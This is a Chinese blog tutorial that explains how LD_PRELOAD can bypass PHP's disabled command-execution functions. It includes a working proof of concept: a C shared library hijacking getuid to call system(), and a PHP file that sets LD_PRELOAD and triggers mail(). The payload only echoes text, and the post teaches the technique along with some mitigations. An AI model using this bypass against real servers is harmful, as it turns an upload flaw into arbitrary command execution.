LD_PRELOAD绕过php命令执行过滤原理

学习自0x03 LD_PRELOAD绕过原理介绍_哔哩哔哩_bilibili

首先是为什么需要LD_PRELOAD来进行绕过?

我们会遇到存在文件上传漏洞,但是把所有命令执行函数全部过滤的情况,这时候无论是什么命令执行函数都不行。那么有一种方法可以从源头上达到执行命令的方法,LD_PRELOAD就是其中一种。

什么是LD_PRELOAD?

LD_PRELOAD是一个在Linux/Unix系统中的环境变量,它允许程序在启动前预加载一个或多个共享库(通常是.so文件)到程序的地址空间中。

什么是库?

库,顾名思义就是用来存放东西的地方,在程序执行这块,就是用来存储程序将要用到的各种函数。这里主要指动态链接库,详细的内容请百度看看程序编译过程。

库里存放了程序执行可能要用到的各种函数。当程序执行时,遇到某个要执行的函数,就会从库中寻找对应的函数。这里有个危险的地方,就是程序寻找这个函数是通过名字,也就是说,我们将这个库中的某个函数内容修改为完全不同的内容,只要名字不变,程序就依旧会执行它。

如何利用LD_PRELOAD绕过

LD_PRELOAD的作用是让我们可以修改库。因此,我们可以自定义一个库,库中指定程序会用到的某个函数,并且精心设计,让这个函数最终可以达到攻击目的。

我们通常会利用mail函数来开始。mail函数执行时会调用getuid函数,此函数会查询当前用户是否为root或者普通用户,因此肯定是靠前执行的。因此我们对这个函数下手。

首先由于存在文件上传漏洞,所以我们要上传一个特殊的php文件,名为demo.php。初步设计文件内容如下:

<?php
mail("","","","");
?>

我们查看这个文件执行时会调用哪些函数,在linux下的命令如下:

strace -o 1.txt -f php demo.php    #将demo.php文件执行时调用的函数名称写入1.txt文件方便查询

然后我们查看1.txt

cat 1.txt

内容繁杂,于是进一步缩小范围,查看执行命令的部分

cat 1.txt | grep execve

由于这是php文件,所以第一个execve肯定是/usr/bin/php,而之后的两个则都是关于sendline的,我们继续查看关于/usr/sbin/sendmail的信息。

readelf -Ws /usr/sbin/sendmail

 

结果依旧繁杂,我们在其中不断寻找,最后找到getuid函数

 

 发现确实有这个getuid函数,因此理论上我们可以来编写假的getuid函数来顶替了。

开始编写脚本

#include<stdlib.h>
#include<stdio.h>
#include<string.h>
void payload(){
    system("echo 'what can i say'");
}
int getuid(){                    //编写自定义的getuid
    unsetenv("LD_PRELOAD");        //这里必须要有这步,否则会循环,详细可查询此函数
    payload();
}

 再将这个c文件编译成.so文件(动态链接库文件)。

gcc -shared -fPIC poc.c -o poc.so

 我们最后还需要在原先的demo.php文件中加入我们新修改而成的库文件的地址,以便于其调用

<?php
putenv("LD_PRELOAD=./poc.so");        //指定库文件路径
mail("","","","");
?>

 最后执行查看效果

php demo.php

 

至此,我们利用了LD_PRELOAD修改了共享库,从而在命令执行函数都被过滤的情况下最终执行了微危险函数。

  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LD_PRELOAD是一个环境变量,用于在程序运行时指定要预加载的共享库。它的工作原理是,当程序需要调用某个符号时,系统会先在程序自身的符号表中查找,如果找不到,则会在LD_PRELOAD指定的共享库中查找。如果在LD_PRELOAD指定的共享库中找到了该符号,则使用该符号中的代码。\[2\] 然而,有时候我们可能需要取消LD_PRELOAD的影响。一种常见的方法是在新进程启动前删除LD_PRELOAD环境变量,可以通过调用unsetenv("LD_PRELOAD")来实现。这样可以避免陷入无限循环的情况。\[1\] 另外,还有两种方法可以让LD_PRELOAD失效。一种是通过静态链接,使用gcc的-static参数可以将libc.so.6静态链接到执行程序中,但这也意味着程序不再支持动态链接。另一种方法是设置执行文件的setgid/setuid标志,对于具有SUID权限的执行文件,系统会忽略LD_PRELOAD环境变量。因此,如果你有以root方式运行的程序,最好设置上SUID权限。\[3\] #### 引用[.reference_title] - *1* [深入分析 LD_PRELOAD](https://blog.csdn.net/itworld123/article/details/125755603)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [LD_PRELOAD的使用](https://blog.csdn.net/Long_xu/article/details/128897509)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [linux LD_PRELOAD 预加载 so 简介](https://blog.csdn.net/whatday/article/details/108890018)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值